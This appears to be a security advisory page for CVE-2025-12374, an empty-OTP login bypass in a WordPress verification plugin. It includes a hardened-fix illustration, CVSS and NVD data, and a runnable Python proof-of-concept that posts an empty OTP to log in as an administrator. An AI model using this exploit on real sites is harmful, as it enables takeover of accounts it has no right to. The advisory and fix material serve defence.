Security Vulnerability Report
CVE-2025-12374 CVSS 9.8 CRITICAL

CVE-2025-12374

Published: 2025-12-05 07:16:11
Last Modified: 2026-04-15 00:35:42

Description

The Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login – User Verification plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.44. This is due to the plugin not properly validating that an OTP was generated before comparing it to user input in the "user_verification_form_wrap_process_otpLogin" function. This makes it possible for unauthenticated attackers to log in as any user with a verified email address, such as an administrator, by submitting an empty OTP value.
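
The defect the description names is a comparison that runs whether or not a code was ever issued, so an empty submission matches an empty stored value. The Python below is an added illustration of that bug class and its fix, not the plugin's code; the user dict, field names and `issue_otp`/`hardened_verify` functions are hypothetical stand-ins for the plugin's storage and login handler.

```python
import hmac
import secrets
import time

OTP_TTL_SECONDS = 300   # an issued code is valid for five minutes
MAX_ATTEMPTS = 5        # wrong guesses tolerated before the code is discarded


def issue_otp(user, now=None):
    """Generate a 6-digit code and record it on the (constructed) user dict."""
    # A dict with no "otp" key models a user for whom no code was ever issued.
    code = f"{secrets.randbelow(10**6):06d}"
    user["otp"] = code
    user["otp_issued_at"] = time.time() if now is None else now
    user["otp_attempts"] = 0
    return code  # the caller would e-mail this to the user


def vulnerable_verify(user, submitted):
    """Flawed pattern: compare whatever is stored with whatever was sent."""
    # With no code issued the stored value defaults to "", so an empty
    # submission compares equal and the login is accepted.
    return user.get("otp", "") == submitted


def hardened_verify(user, submitted, now=None):
    """Accept only a pending, unexpired code, compared in constant time."""
    now = time.time() if now is None else now
    stored = user.get("otp")
    if not stored:                                      # nothing issued: refuse
        return False                                    # (the missing check)
    if now - user["otp_issued_at"] > OTP_TTL_SECONDS:   # stale: discard it
        _clear_otp(user)
        return False
    if submitted and hmac.compare_digest(stored.encode(), str(submitted).encode()):
        _clear_otp(user)                                # single use
        return True
    user["otp_attempts"] += 1
    if user["otp_attempts"] >= MAX_ATTEMPTS:            # throttle guessing
        _clear_otp(user)
    return False


def _clear_otp(user):
    """Drop any outstanding code so it cannot be reused or replayed."""
    for key in ("otp", "otp_issued_at", "otp_attempts"):
        user.pop(key, None)
```

For detection, the same distinction applies to logs: an OTP login that succeeds for an account with no preceding "code sent" event is the signal to alert on.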

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress User Verification plugin <= 2.0.44 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re

# CVE-2025-12374 PoC - WordPress User Verification Plugin Authentication Bypass
# Target: WordPress site with User Verification plugin <= 2.0.44


def exploit_auth_bypass(target_url, target_email):
    """
    Exploit the authentication bypass vulnerability in User Verification plugin.
    The vulnerability allows attackers to bypass OTP verification by submitting
    an empty OTP value.

    Args:
        target_url: Base URL of the WordPress site
        target_email: Email address of a verified user (e.g., admin)

    Returns:
        Boolean indicating if exploitation was successful
    """
    # Step 1: Identify the OTP login endpoint
    login_endpoint = f"{target_url.rstrip('/')}/wp-login.php"

    # Step 2: Prepare the malicious request with empty OTP
    # The vulnerability is in the OTP validation logic that doesn't check
    # if OTP was actually generated before comparing
    payload = {
        'user_verification_otp_login': '1',
        'user_email': target_email,
        'user_otp': '',  # Empty OTP bypasses authentication
        'redirect_to': '/wp-admin/',
    }

    try:
        # Step 3: Send the authentication bypass request
        response = requests.post(
            login_endpoint,
            data=payload,
            allow_redirects=False,
            timeout=30
        )

        # Step 4: Check for successful authentication
        # Successful bypass typically results in redirect to admin area
        if response.status_code in [301, 302, 303] and 'wp-admin' in response.headers.get('Location', ''):
            print(f"[+] Authentication bypass successful!")
            print(f"[+] Logged in as: {target_email}")
            print(f"[+] Redirect location: {response.headers.get('Location')}")
            return True

        # Alternative check: Look for auth cookies or success indicators
        if 'wordpress_logged_in' in str(response.cookies):
            print(f"[+] Authentication bypass successful!")
            return True

        print(f"[-] Authentication bypass failed")
        print(f"[-] Status code: {response.status_code}")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


# Example usage
if __name__ == "__main__":
    target = "http://target-wordpress-site.com"
    admin_email = "[email protected]"
    exploit_auth_bypass(target, admin_email)

References

https://plugins.trac.wordpress.org/browser/user-verification/trunk/templates/email-otp-login-form/hook.php#L141
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3442150%40user-verification&new=3442150%40user-verification&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/8ccb1304-326e-43af-b75d-23874f92ba8b?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12374",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T07:16:11.117",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login – User Verification plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.44. This is due to the plugin not properly validating that an OTP was generated before comparing it to user input in the \"user_verification_form_wrap_process_otpLogin\" function. This makes it possible for unauthenticated attackers to log in as any user with a verified email address, such as an administrator, by submitting an empty OTP value."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-287"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/user-verification/trunk/templates/email-otp-login-form/hook.php#L141",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3442150%40user-verification&new=3442150%40user-verification&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ccb1304-326e-43af-b75d-23874f92ba8b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}